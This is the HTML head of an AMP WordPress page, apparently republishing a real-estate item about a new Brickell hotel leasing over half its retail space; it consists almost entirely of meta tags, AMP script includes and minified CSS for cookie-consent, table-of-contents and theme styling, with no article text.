#dfdfdf}:where(amp-accordion>section)>:last-child{margin:0}}amp-accordion>section{float:none!important}amp-accordion>section>*{float:none!important;display:block!important;overflow:hidden!important;position:relative!important}amp-accordion,amp-accordion>section{margin:0}amp-accordion:not(.i-amphtml-built)>section>:last-child{display:none!important}amp-accordion:not(.i-amphtml-built)>section[expanded]>:last-child{display:block!important} /*# sourceURL=/css/ampshared.css*/</style><meta name="amp-to-amp-navigation" content="AMP-Redirect-To; AMP.navigateTo"><meta name="robots" content="max-image-preview:large"><meta property="og:image" content="https://therealdeal.com/miami/wp-content/uploads/2022/01/MIA-Lease-roundup-Speakeasy-bakery-facial-bar-lease-at-new-AC-by-Marriott-Element-by-Westin-hotel-in-Brickell-FEATUREIMG.jpg"><meta property="og:title" content="New Brickell Hotel Leases Over 50{352461131e134de422042936fefa1ec7b3be3957215d9cdd4e62cdd9b65caf90} of Retail Space"><meta property="og:description" content=""><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="New Brickell Hotel Leases Over 50{352461131e134de422042936fefa1ec7b3be3957215d9cdd4e62cdd9b65caf90} of Retail Space"><meta name="twitter:description" content=""><meta name="twitter:image" content="https://therealdeal.com/miami/wp-content/uploads/2022/01/MIA-Lease-roundup-Speakeasy-bakery-facial-bar-lease-at-new-AC-by-Marriott-Element-by-Westin-hotel-in-Brickell-FEATUREIMG.jpg"><meta name="generator" content="AMP Plugin v2.4.0; mode=transitional"><meta name="msapplication-TileImage" content="https://sdbis.com/wp-content/uploads/2021/09/cropped-default-1-270x270.png"><link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><link rel="dns-prefetch" href="//fonts.googleapis.com"><link rel="preload" href="https://sdbis.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot#iefix&v=4.7.0" as="font" crossorigin=""><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""><link rel="dns-prefetch" href="https://fonts.gstatic.com"><script async="" src="https://cdn.ampproject.org/v0.mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-form-0.1.mjs" async="" custom-element="amp-form" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0/amp-form-0.1.js" crossorigin="anonymous" custom-element="amp-form"></script><link rel="icon" href="https://sdbis.com/wp-content/uploads/2021/09/cropped-default-1-32x32.png" sizes="32x32"><link rel="icon" href="https://sdbis.com/wp-content/uploads/2021/09/cropped-default-1-192x192.png" sizes="192x192"><link crossorigin="anonymous" rel="stylesheet" id="seek-google-fonts-css" href="https://fonts.googleapis.com/css?family=Raleway:400,400i,600,600i,700" type="text/css" media="all"><style amp-custom="">.twp-site-branding .twp-logo,.twp-site-branding.twp-overlay .twp-logo,.twp-site-branding .twp-logo a,.twp-site-branding .twp-logo a:visited .twp-site-branding.twp-overlay .twp-logo a,.twp-site-branding.twp-overlay .twp-logo a:visited{color:#fff}amp-img.amp-wp-enforced-sizes{object-fit:contain}amp-img img,amp-img noscript{image-rendering:inherit;object-fit:inherit;object-position:inherit}:where(.wp-block-button__link){box-shadow:none;text-decoration:none;border-radius:9999px;padding:calc(.667em + 2px) calc(1.333em + 2px)}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}:where(.wp-block-post-comments input[type=submit]){border:none}:where(.wp-block-file__button){border-radius:2em;padding:.5em 1em}:where(.wp-block-file__button):is(a):active,:where(.wp-block-file__button):is(a):focus,:where(.wp-block-file__button):is(a):hover,:where(.wp-block-file__button):is(a):visited{box-shadow:none;color:#fff;opacity:.85;text-decoration:none}.wp-block-group{box-sizing:border-box}.wp-block-latest-comments .wp-block-latest-comments{padding-left:0}.wp-block-latest-posts.wp-block-latest-posts__list{list-style:none;padding-left:0}.wp-block-latest-posts.wp-block-latest-posts__list li{clear:both}ul{box-sizing:border-box}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}:where(p.has-text-color:not(.has-link-color)) a{color:inherit}.wp-block-search__button{margin-left:.625em;word-break:normal}.wp-block-search__button svg{min-width:1.5em;min-height:1.5em;fill:currentColor;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:.375em .625em}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{padding:8px;flex-grow:1;margin-left:0;margin-right:0;min-width:3em;border:1px solid #949494}.wp-block-search__input:not(#_#_#_#_#_#_#_){text-decoration:unset}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper){padding:4px;border:1px solid #949494}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input{border-radius:0;border:none;padding:0 0 0 .25em}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) .wp-block-search__input:focus{outline:none}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper) :where(.wp-block-search__button){padding:.125em .5em}.wp-element-button{cursor:pointer}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.screen-reader-text:not(#_#_#_#_#_#_#_){word-wrap:normal}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.screen-reader-text:focus:not(#_#_#_#_#_#_#_){clip:auto}html :where(.has-border-color){border-style:solid}html :where([data-amp-original-style*=border-top-color]){border-top-style:solid}html :where([data-amp-original-style*=border-right-color]){border-right-style:solid}html :where([data-amp-original-style*=border-bottom-color]){border-bottom-style:solid}html :where([data-amp-original-style*=border-left-color]){border-left-style:solid}html :where([data-amp-original-style*=border-width]){border-style:solid}html :where([data-amp-original-style*=border-top-width]){border-top-style:solid}html :where([data-amp-original-style*=border-right-width]){border-right-style:solid}html :where([data-amp-original-style*=border-bottom-width]){border-bottom-style:solid}html :where([data-amp-original-style*=border-left-width]){border-left-style:solid}html :where(amp-img[class*=wp-image-]),html :where(amp-anim[class*=wp-image-]){height:auto;max-width:100%}body{--wp--preset--color--black:#000;--wp--preset--color--cyan-bluish-gray:#abb8c3;--wp--preset--color--white:#fff;--wp--preset--color--pale-pink:#f78da7;--wp--preset--color--vivid-red:#cf2e2e;--wp--preset--color--luminous-vivid-orange:#ff6900;--wp--preset--color--luminous-vivid-amber:#fcb900;--wp--preset--color--light-green-cyan:#7bdcb5;--wp--preset--color--vivid-green-cyan:#00d084;--wp--preset--color--pale-cyan-blue:#8ed1fc;--wp--preset--color--vivid-cyan-blue:#0693e3;--wp--preset--color--vivid-purple:#9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple:linear-gradient(135deg,rgba(6,147,227,1) 0%,#9b51e0 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan:linear-gradient(135deg,#7adcb4 0%,#00d082 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange:linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:linear-gradient(135deg,rgba(255,105,0,1) 0%,#cf2e2e 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray:linear-gradient(135deg,#eee 0%,#a9b8c3 100%);--wp--preset--gradient--cool-to-warm-spectrum:linear-gradient(135deg,#4aeadc 0%,#9778d1 20%,#cf2aba 40%,#ee2c82 60%,#fb6962 80%,#fef84c 100%);--wp--preset--gradient--blush-light-purple:linear-gradient(135deg,#ffceec 0%,#9896f0 100%);--wp--preset--gradient--blush-bordeaux:linear-gradient(135deg,#fecda5 0%,#fe2d2d 50%,#6b003e 100%);--wp--preset--gradient--luminous-dusk:linear-gradient(135deg,#ffcb70 0%,#c751c0 50%,#4158d0 100%);--wp--preset--gradient--pale-ocean:linear-gradient(135deg,#fff5cb 0%,#b6e3d4 50%,#33a7b5 100%);--wp--preset--gradient--electric-grass:linear-gradient(135deg,#caf880 0%,#71ce7e 100%);--wp--preset--gradient--midnight:linear-gradient(135deg,#020381 0%,#2874fc 100%);--wp--preset--duotone--dark-grayscale:url("#wp-duotone-dark-grayscale");--wp--preset--duotone--grayscale:url("#wp-duotone-grayscale");--wp--preset--duotone--purple-yellow:url("#wp-duotone-purple-yellow");--wp--preset--duotone--blue-red:url("#wp-duotone-blue-red");--wp--preset--duotone--midnight:url("#wp-duotone-midnight");--wp--preset--duotone--magenta-yellow:url("#wp-duotone-magenta-yellow");--wp--preset--duotone--purple-green:url("#wp-duotone-purple-green");--wp--preset--duotone--blue-orange:url("#wp-duotone-blue-orange");--wp--preset--font-size--small:13px;--wp--preset--font-size--medium:20px;--wp--preset--font-size--large:36px;--wp--preset--font-size--x-large:42px;--wp--preset--spacing--20:.44rem;--wp--preset--spacing--30:.67rem;--wp--preset--spacing--40:1rem;--wp--preset--spacing--50:1.5rem;--wp--preset--spacing--60:2.25rem;--wp--preset--spacing--70:3.38rem;--wp--preset--spacing--80:5.06rem}:where(.is-layout-flex){gap:.5em}:where(.wp-block-columns.is-layout-flex){gap:2em}:where(.wp-block-columns.is-layout-flex){gap:2em}@keyframes spin{from{transform:rotate(0deg)}to{transform:rotate(360deg)}}@keyframes blink{from{opacity:0}50%{opacity:1}to{opacity:0}}#cookie-law-info-bar{font-size:15px;margin:0 auto;padding:12px 10px;position:absolute;text-align:center;box-sizing:border-box;width:100%;z-index:9999;display:none;left:0px;font-weight:300;box-shadow:0 -1px 10px 0 rgba(172,171,171,.3)}#cookie-law-info-again{font-size:10pt;margin:0;padding:5px 10px;text-align:center;z-index:9999;cursor:pointer;box-shadow:#161616 2px 2px 5px 2px}#cookie-law-info-bar span{vertical-align:middle}.cli-plugin-button,.cli-plugin-button:visited{display:inline-block;padding:9px 12px;color:#fff;text-decoration:none;text-decoration:none;position:relative;cursor:pointer;margin-left:5px}.cli-plugin-button:hover{background-color:#111;color:#fff;text-decoration:none}.cli-plugin-button,.cli-plugin-button:visited,.medium.cli-plugin-button,.medium.cli-plugin-button:visited{font-size:13px;font-weight:400;line-height:1}.cli-plugin-button{margin-top:5px}.cli-bar-popup{-moz-background-clip:padding;-webkit-background-clip:padding;background-clip:padding-box;-webkit-border-radius:30px;-moz-border-radius:30px;border-radius:30px;padding:20px}.cli-container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.cli-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-align-items-stretch:not(#_#_#_#_#_#_#_){-ms-flex-align:stretch;align-items:stretch}.cli-px-0{padding-left:0;padding-right:0}.cli-btn{cursor:pointer;font-size:14px;display:inline-block;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;padding:.5rem 1.25rem;line-height:1;border-radius:.25rem;transition:all .15s ease-in-out}.cli-btn:hover{opacity:.8}.cli-btn:focus{outline:0}.cli-modal.cli-fade .cli-modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translate(0,-25%);transform:translate(0,-25%)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;display:none}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal a{text-decoration:none}.cli-modal .cli-modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;min-height:calc(100% - ( .5rem * 2 ))}@media (min-width: 576px){.cli-modal .cli-modal-dialog{max-width:500px;margin:1.75rem auto;min-height:calc(100% - ( 1.75rem * 2 ))}}@media (min-width: 992px){.cli-modal .cli-modal-dialog{max-width:900px}}.cli-modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border-radius:.3rem;outline:0}.cli-modal .cli-modal-close{position:absolute;right:10px;top:10px;z-index:1;padding:0;border:0;-webkit-appearance:none;font-size:1.5rem;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff}.cli-modal .cli-modal-close:not(#_#_#_#_#_#_#_){background-color:transparent}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:1px;padding-left:70px;font-size:14px}.cli-switch input[type="checkbox"]{display:none}.cli-switch .cli-slider{background-color:#e3e1e8;height:24px;width:50px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0;transition:.4s}.cli-switch .cli-slider:before{background-color:#fff;bottom:2px;content:"";height:20px;left:2px;position:absolute;transition:.4s;width:20px}.cli-switch input:checked + .cli-slider{background-color:#00acad}.cli-switch input:checked + .cli-slider:before{transform:translateX(26px)}.cli-switch .cli-slider{border-radius:34px}.cli-switch .cli-slider:before{border-radius:50%}.cli-tab-content{background:#fff}.cli-fade{transition:opacity .15s linear}.cli-tab-content{width:100%;padding:30px}@media (max-width: 767px){.cli-tab-content{padding:30px 10px}}.cli-tab-content p{color:#343438;font-size:14px;margin-top:0}.cli-tab-content h4{font-size:20px;margin-bottom:1.5rem;margin-top:0;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}.cli-container-fluid{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}.cli-row{display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;margin-right:-15px;margin-left:-15px}.cli-align-items-stretch:not(#_#_#_#_#_#_#_){-ms-flex-align:stretch;align-items:stretch}.cli-px-0{padding-left:0;padding-right:0}.cli-btn{cursor:pointer;font-size:14px;display:inline-block;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;border:1px solid transparent;padding:.5rem 1.25rem;line-height:1;border-radius:.25rem;transition:all .15s ease-in-out}.cli-btn:hover{opacity:.8}.cli-btn:focus{outline:0}.cli-modal.cli-fade .cli-modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translate(0,-25%);transform:translate(0,-25%)}.cli-modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000;-webkit-transform:scale(0);transform:scale(0);transition:opacity ease-in-out .5s}.cli-modal-backdrop.cli-fade{opacity:0}.cli-modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:99999;transform:scale(0);overflow:hidden;outline:0;display:none}.cli-modal a{text-decoration:none}.cli-modal .cli-modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none;font-family:inherit;font-size:1rem;font-weight:400;line-height:1.5;color:#212529;text-align:left;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;min-height:calc(100% - ( .5rem * 2 ))}@media (min-width: 576px){.cli-modal .cli-modal-dialog{max-width:500px;margin:1.75rem auto;min-height:calc(100% - ( 1.75rem * 2 ))}}.cli-modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border-radius:.2rem;box-sizing:border-box;outline:0}.cli-modal .cli-modal-close:focus{outline:0}.cli-switch{display:inline-block;position:relative;min-height:1px;padding-left:38px;font-size:14px}.cli-switch input[type="checkbox"]{display:none}.cli-switch .cli-slider{background-color:#e3e1e8;height:20px;width:38px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0;transition:.4s}.cli-switch .cli-slider:before{background-color:#fff;bottom:2px;content:"";height:15px;left:3px;position:absolute;transition:.4s;width:15px}.cli-switch input:checked + .cli-slider{background-color:#61a229}.cli-switch input:checked + .cli-slider:before{transform:translateX(18px)}.cli-switch .cli-slider{border-radius:34px;font-size:0}.cli-switch .cli-slider:before{border-radius:50%}.cli-tab-content{background:#fff}.cli-tab-content{width:100%;padding:5px 30px 5px 5px;box-sizing:border-box}@media (max-width: 767px){.cli-tab-content{padding:30px 10px}}.cli-tab-content p{color:#343438;font-size:14px;margin-top:0}.cli-tab-content h4{font-size:20px;margin-bottom:1.5rem;margin-top:0;font-family:inherit;font-weight:500;line-height:1.2;color:inherit}#cookie-law-info-bar .cli-tab-content{background:transparent}#cookie-law-info-bar .cli-nav-link,#cookie-law-info-bar .cli-tab-container p,#cookie-law-info-bar span.cli-necessary-caption,#cookie-law-info-bar .cli-switch .cli-slider:after{color:inherit}#cookie-law-info-bar .cli-tab-header a:before{border-right:1px solid currentColor;border-bottom:1px solid currentColor}#cookie-law-info-bar .cli-row{margin-top:20px}#cookie-law-info-bar .cli-tab-content h4{margin-bottom:.5rem}#cookie-law-info-bar .cli-tab-container{display:none;text-align:left}.cli-tab-footer .cli-btn{background-color:#00acad;padding:10px 15px;text-decoration:none}.cli-tab-footer .wt-cli-privacy-accept-btn{background-color:#61a229;color:#fff;border-radius:0}.cli-tab-footer{width:100%;text-align:right;padding:20px 0}.cli-col-12{width:100%}.cli-tab-header{display:flex;justify-content:space-between}.cli-tab-header a:before{width:10px;height:2px;left:0;top:calc(50% - 1px)}.cli-tab-header a:after{width:2px;height:10px;left:4px;top:calc(50% - 5px);-webkit-transform:none;transform:none}.cli-tab-header a:before{width:7px;height:7px;border-right:1px solid #4a6e78;border-bottom:1px solid #4a6e78;content:" ";transform:rotate(-45deg);-webkit-transition:all .2s ease-in-out;-moz-transition:all .2s ease-in-out;transition:all .2s ease-in-out;margin-right:10px}.cli-tab-header a.cli-nav-link{position:relative;display:flex;align-items:center;font-size:14px;color:#000;text-transform:capitalize}.cli-tab-header{border-radius:5px;padding:12px 15px;cursor:pointer;transition:background-color .2s ease-out .3s,color .2s ease-out 0s;background-color:#f2f2f2}.cli-modal .cli-modal-close{position:absolute;right:0;top:0;z-index:1;-webkit-appearance:none;width:40px;height:40px;padding:0;padding:10px;border-radius:50%;background:transparent;border:none;min-width:40px}.cli-tab-container h4,.cli-tab-container h1{font-family:inherit;font-size:16px;margin-bottom:15px;margin:10px 0}#cliSettingsPopup .cli-tab-section-container{padding-top:12px}.cli-tab-container p,.cli-privacy-content-text{font-size:14px;line-height:1.4;margin-top:0;padding:0;color:#000}.cli-tab-content{display:none}.cli-tab-section .cli-tab-content{padding:10px 20px 5px 20px}.cli-tab-section{margin-top:5px}@media (min-width: 992px){.cli-modal .cli-modal-dialog{max-width:645px}}.cli-switch .cli-slider:after{content:attr(data-cli-disable);position:absolute;right:50px;color:#000;font-size:12px;text-align:right;min-width:80px}.cli-switch input:checked + .cli-slider:after{content:attr(data-cli-enable)}.cli-privacy-overview:not(.cli-collapsed) .cli-privacy-content{max-height:60px;transition:max-height .15s ease-out;overflow:hidden}a.cli-privacy-readmore{font-size:12px;margin-top:12px;display:inline-block;padding-bottom:0;cursor:pointer;color:#000;text-decoration:underline}.cli-modal-footer{position:relative}a.cli-privacy-readmore:before{content:attr(data-readmore-text)}.cli-privacy-content p{margin-bottom:0}.cli-modal-close svg{fill:#000}span.cli-necessary-caption{color:#000;font-size:12px}#cookie-law-info-bar .cli-privacy-overview{display:none}.cli-tab-container .cli-row{max-height:500px;overflow-y:auto}@keyframes blowUpContent{0%{transform:scale(1);opacity:1}99.9%{transform:scale(2);opacity:0}100%{transform:scale(0)}}@keyframes blowUpContentTwo{0%{transform:scale(2);opacity:0}100%{transform:scale(1);opacity:1}}@keyframes blowUpModal{0%{transform:scale(0)}100%{transform:scale(1)}}@keyframes blowUpModalTwo{0%{transform:scale(1);opacity:1}50%{transform:scale(.5);opacity:0}100%{transform:scale(0);opacity:0}}.cli-tab-section .cookielawinfo-row-cat-table td,.cli-tab-section .cookielawinfo-row-cat-table th{font-size:12px}.cli_settings_button{cursor:pointer}.wt-cli-sr-only{display:none;font-size:16px}.cli-bar-container{float:none;margin:0 auto;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;justify-content:space-between;-webkit-box-align:center;-moz-box-align:center;-ms-flex-align:center;-webkit-align-items:center;align-items:center}.cli-bar-btn_container{margin-left:20px;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-webkit-box-align:center;-moz-box-align:center;-ms-flex-align:center;-webkit-align-items:center;align-items:center;flex-wrap:nowrap}.cli-style-v2 a{cursor:pointer}.cli-bar-btn_container a{white-space:nowrap}.cli-style-v2{font-size:11pt;line-height:18px;font-weight:normal}.cli-style-v2 .cli-bar-message{width:70%;text-align:left}.cli-style-v2 .cli-bar-btn_container .cli_action_button,.cli-style-v2 .cli-bar-btn_container .cli_settings_button{margin-left:5px}.cli-style-v2 .cli_settings_button:not(.cli-plugin-button),.cli-style-v2 .cli_action_button:not(.cli-plugin-button){text-decoration:underline}.cli-style-v2 .cli-bar-btn_container .cli-plugin-button{margin-top:5px;margin-bottom:5px}.wt-cli-necessary-checkbox:not(#_#_#_#_#_#_#_){display:none}@media (max-width: 985px){.cli-style-v2 .cli-bar-message{width:100%}.cli-style-v2.cli-bar-container{justify-content:left;flex-wrap:wrap}.cli-style-v2 .cli-bar-btn_container{margin-left:0px;margin-top:10px}}.wt-cli-privacy-overview-actions{padding-bottom:0}@media only screen and (max-width: 479px) and (min-width: 320px){.cli-style-v2 .cli-bar-btn_container{flex-wrap:wrap}}.wt-cli-cookie-description{font-size:14px;line-height:1.4;margin-top:0;padding:0;color:#000}#ez-toc-container{background:#f9f9f9;border:1px solid #aaa;border-radius:4px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.05);box-shadow:0 1px 1px rgba(0,0,0,.05);display:table;margin-bottom:1em;padding:10px;position:relative;width:auto}#ez-toc-container ul ul{margin-left:1.5em}#ez-toc-container li,#ez-toc-container ul{padding:0}#ez-toc-container li,#ez-toc-container ul,#ez-toc-container ul li{background:0 0;list-style:none;line-height:1.6;margin:0;overflow:hidden;z-index:1}#ez-toc-container p.ez-toc-title{text-align:left;line-height:1.45;margin:0;padding:0}.ez-toc-title-container{display:table;width:100%}.ez-toc-title,.ez-toc-title-toggle{display:inline;text-align:left;vertical-align:middle}.ez-toc-btn{display:inline-block;font-weight:400}#ez-toc-container div.ez-toc-title-container+ul.ez-toc-list{margin-top:1em}#ez-toc-container a{color:#444;box-shadow:none;text-decoration:none;text-shadow:none;display:inline-flex;align-items:stretch;flex-wrap:nowrap}#ez-toc-container a:visited{color:#9f9f9f}#ez-toc-container a:hover{text-decoration:underline}.ez-toc-btn{padding:6px 12px;margin-bottom:0;font-size:14px;line-height:1.428571429;text-align:center;white-space:nowrap;vertical-align:middle;cursor:pointer;background-image:none;border:1px solid transparent;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none}.ez-toc-btn:focus{outline:#333 dotted thin;outline:-webkit-focus-ring-color auto 5px;outline-offset:-2px}.ez-toc-btn:focus,.ez-toc-btn:hover{color:#333;text-decoration:none}.ez-toc-btn:active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.ez-toc-btn-default{color:#333;background-color:#fff;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 1px rgba(0,0,0,.075);text-shadow:0 1px 0 #fff;background-image:-webkit-gradient(linear,left 0,left 100%,from(#fff),to(#e0e0e0));background-image:-webkit-linear-gradient(top,#fff 0,#e0e0e0 100%);background-image:-moz-linear-gradient(top,#fff 0,#e0e0e0 100%);background-image:linear-gradient(to bottom,#fff 0,#e0e0e0 100%);background-repeat:repeat-x;border-color:#ccc}.ez-toc-btn-default:active,.ez-toc-btn-default:focus,.ez-toc-btn-default:hover{color:#333;background-color:#ebebeb;border-color:#adadad}.ez-toc-btn-default:active{background-image:none;background-color:#e0e0e0;border-color:#dbdbdb}.ez-toc-btn-xs{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.ez-toc-btn-xs{padding:1px 5px}.ez-toc-btn-default:active{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.ez-toc-btn:active{background-image:none}.ez-toc-btn-default:focus,.ez-toc-btn-default:hover{background-color:#e0e0e0;background-position:0 -15px}.ez-toc-pull-right{margin-left:10px}.ez-toc-pull-right:not(#_#_#_#_#_#_#_){float:right}#ez-toc-container input{position:absolute;left:-999em}#ez-toc-container input[type=checkbox]:checked+nav{opacity:0;max-height:0;border:none;display:none}#ez-toc-container label{float:right;position:relative;font-size:16px;padding:0 4px 0 5px;border:1px solid #999191;border-radius:5px;cursor:pointer;width:30px;left:10px}#ez-toc-container .ez-toc-toggle label{float:right;position:relative;font-size:16px;padding:0;border:1px solid #999191;border-radius:5px;cursor:pointer;left:10px;width:35px}div#ez-toc-container p.ez-toc-title{display:contents}div#ez-toc-container{padding-right:20px}#ez-toc-container a.ez-toc-toggle{display:flex;align-items:center;color:#444;background:inherit;border:inherit}div#ez-toc-container p.ez-toc-title{font-size:120%}div#ez-toc-container p.ez-toc-title{font-weight:500}div#ez-toc-container ul li{font-size:95%}div#ez-toc-container nav ul ul li ul li:not(#_#_#_#_#_#_#_#_#_){font-size:90%}.ez-toc-container-direction{direction:ltr}.ez-toc-counter ul{counter-reset:item}.ez-toc-counter nav ul li a::before{content:counters(item,".",decimal) ". ";display:inline-block;counter-increment:item;flex-grow:0;flex-shrink:0;margin-right:.2em;float:left}@font-face{font-family:"FontAwesome";src:url("https://sdbis.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot?v=4.7.0");src:url("https://sdbis.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.eot#iefix&v=4.7.0") format("embedded-opentype"),url("https://sdbis.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0") format("woff2"),url("https://sdbis.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.woff?v=4.7.0") format("woff"),url("https://sdbis.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.ttf?v=4.7.0") format("truetype"),url("https://sdbis.com/wp-content/themes/seek/assets/libraries/font-awesome/fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular") format("svg");font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.fa-search:before{content:""}.fa-home:before{content:""}.fa-clock-o:before{content:""}.fa-chevron-right:before{content:""}.fa-chevron-up:before{content:""}.fa-flash:before{content:""}button::-moz-focus-inner{padding:0;border:0}html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}h1{font-size:2em;margin:.67em 0}a{background-color:transparent}amp-img{border-style:none}button,input{font-family:inherit;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button{text-transform:none}button,[type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}[type=checkbox],[type=radio]{box-sizing:border-box;padding:0}[type=number]::-webkit-inner-spin-button,[type=number]::-webkit-outer-spin-button{height:auto}[type=search]{-webkit-appearance:textfield;outline-offset:-2px}[type=search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}[hidden]{display:none}body,button,input{color:#404040;font-family:sans-serif;font-size:16px;font-size:1rem;line-height:1.5}h1,h2,h3,h4{clear:both}p{margin-bottom:1.5em}em,i{font-style:italic}html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}body{background:#fff}ul{margin:0 0 1.5em 3em}ul{list-style:disc}li > ul{margin-bottom:0;margin-left:1.5em}amp-img{height:auto;max-width:100%}table{margin:0 0 1.5em;width:100%}button,input[type=button],input[type=reset],input[type=submit]{border:1px solid;border-color:#ccc #ccc #bbb;border-radius:3px;background:#e6e6e6;color:rgba(0,0,0,.8);font-size:12px;font-size:.75rem;line-height:1;padding:.6em 1em .4em}button:hover,input[type=button]:hover,input[type=reset]:hover,input[type=submit]:hover{border-color:#ccc #bbb 